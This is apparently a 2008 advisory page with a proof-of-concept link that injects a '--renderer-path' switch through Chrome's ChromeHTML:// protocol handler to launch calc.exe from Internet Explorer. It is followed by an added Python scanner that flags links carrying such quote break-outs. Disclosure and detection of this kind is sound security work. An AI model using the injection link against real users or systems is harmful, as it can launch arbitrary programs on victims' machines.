Google Chrome Remote Parameter Injection

December 23, 2008 – 5:19 PM
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
tested against: Internet Explorer 8 beta 2, Google Chrome, Microsoft Windows XP SP3
List of command line switches:
Original url:

Click the following link with IE while monitoring with Procmon:
<a href='"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
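A defensive check for the pattern in the link above, added here as an example and not part of the original advisory: it percent-decodes each `href` and reports the switch names that would follow a quote break-out. It assumes the protocol handler receives the URL inside a double-quoted command-line argument; `injected_switches`, `LinkScanner`, `scan_html` and `SAMPLE_HTML` are names made up for this sketch.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Assumption: the handler receives the URL inside a double-quoted argument, so
# a decoded '"' ends that argument and whitespace + "--name" starts a switch.
BREAKOUT = re.compile(r'"\s+--[A-Za-z][\w-]*')
SWITCH = re.compile(r'\s--([A-Za-z][\w-]*)')

# Sample input: the link from this page plus one constructed benign link.
SAMPLE_HTML = r'''
<a href='"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
<a href="https://example.com/a%20b?q=--x">constructed benign link</a>
'''


def injected_switches(href):
    """Return the switch names an href would inject once percent-decoded."""
    decoded = unquote(href)
    if not BREAKOUT.search(decoded):
        return []
    return SWITCH.findall(decoded)


class LinkScanner(HTMLParser):
    """Collect (href, switches) for every link that breaks out of its quotes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "href" and value:
                switches = injected_switches(value)
                if switches:
                    self.findings.append((value, switches))


def scan_html(html):
    scanner = LinkScanner()
    scanner.feed(html)
    return scanner.findings


if __name__ == "__main__":
    for href, switches in scan_html(SAMPLE_HTML):
        print("suspicious href:", href, "->", switches)
```

The same predicate can run inside a handler before it builds a command line, rejecting any URL for which `injected_switches` returns a non-empty list.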

